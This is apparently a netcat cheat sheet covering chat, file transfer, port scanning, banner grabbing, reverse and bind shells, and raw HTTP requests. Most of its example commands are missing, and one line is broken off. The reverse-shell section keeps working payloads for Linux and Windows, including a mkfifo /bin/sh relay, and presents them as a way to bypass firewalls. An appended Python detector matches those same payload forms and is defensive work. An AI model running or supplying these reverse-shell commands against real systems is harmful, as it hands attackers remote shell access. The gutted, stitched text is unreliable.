Ultimate Netcat Cheat Sheet
The “Swiss Army Knife” of TCP/IP networking.
1. Connection & Chat
The most basic usage: creating a simple client-server chat connection.
Server (Listener)
Run this on Machine A.
-l: Listen mode
-v: Verbose (show info)
-n: No DNS lookup (faster)
-p: Local port
Client (Connector)
Run this on Machine B.
2. File Transfer
Transfer files between machines. Always start the Receiver first.
Receive File (Destination)
Listen and output content to a file.
Send File (Source)
Connect and push content into the pipe.
3. Port Scanning & Banners
Netcat can act as a simple port scanner when Nmap isn’t available.
TCP Scan
Scan ports 20 through 80. The -z flag means “Zero-I/O” (don’t send data, just scan).
UDP Scan
Add the -u flag for UDP ports.
Banner Grabbing
Connect to a port to see what version string the service sends back.
4. Reverse Shells (The “Hacker” Way)
Make the target connect back to you. Bypasses most inbound firewalls.
1. Setup Listener (Your Machine)
2. Execute Payload (Target Machine)
| OS | Command |
|---|---|
| Linux (Traditional) | nc -e /bin/bash [IP] 4444 |
| Windows | nc.exe -e cmd.exe [IP] 4444 |
| Linux (No -e flag) | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc [IP] 4444 >/tmp/f |
-e flag for security. Use the “No -e flag” mkfifo method above.
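On the defensive side, the three payload forms in the table leave recognizable process command lines. The following is an added example, not part of the original cheat sheet: it classifies command-line strings (as they might appear in shell history or an EDR process field) against those forms. The function names, the binary and shell name lists, and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed name lists; extend for the binaries present in your environment.
NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd", "cmd.exe"}

def _base(path):
    """File name without directory, lower-cased; handles / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def _stages(cmdline):
    """Split a shell string on ';' and '|' and tokenize each stage."""
    parts = ([t.strip("'\"") for t in p.split()] for p in re.split(r"[;|]+", cmdline))
    return [toks for toks in parts if toks]

def classify(cmdline):
    """Return 'nc-exec-shell', 'fifo-shell-relay' or None for one command line."""
    stages = _stages(cmdline)
    nc = [s for s in stages if _base(s[0]) in NC_NAMES]
    if not nc:
        return None
    # Pattern 1: nc ... -e <shell> (first two rows of the table).
    for s in nc:
        for flag, arg in zip(s[1:], s[2:]):
            if re.fullmatch(r"-[A-Za-z]*e", flag) and _base(arg) in SHELLS:
                return "nc-exec-shell"
    # Pattern 2: mkfifo + interactive shell + nc wired to the same FIFO (third row).
    fifos = {a for s in stages if _base(s[0]) == "mkfifo"
             for a in s[1:] if not a.startswith("-")}
    has_shell = any(_base(s[0]) in SHELLS and "-i" in s for s in stages)
    nc_uses_fifo = any(t.lstrip("0123456789<>") in fifos for s in nc for t in s[1:])
    if fifos and has_shell and nc_uses_fifo:
        return "fifo-shell-relay"
    return None

# Constructed sample command lines (203.0.113.10 is a documentation address).
SAMPLES = [
    "nc -e /bin/bash 203.0.113.10 4444",
    r"C:\Tools\nc.exe -e cmd.exe 203.0.113.10 4444",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.10 4444 >/tmp/f",
    "nc -zv 203.0.113.10 20-80",
    "nc -lvnp 4444 > received.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line) or 'ok':18} {line}")
```

The port scan and file-receive lines are deliberately left unflagged, so the rule separates the exec and FIFO patterns from the routine uses covered in sections 2 and 3.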
5. Bind Shells
Open a port on the target and wait for a connection. (Blocked by most firewalls).
1. Setup Listener (Target Machine)
2. Connect (Your Machine)
6. Web Server Interaction
Manually talk to a web server to debug headers.
Manual HTTP Request
Then type:
(Press Enter twice)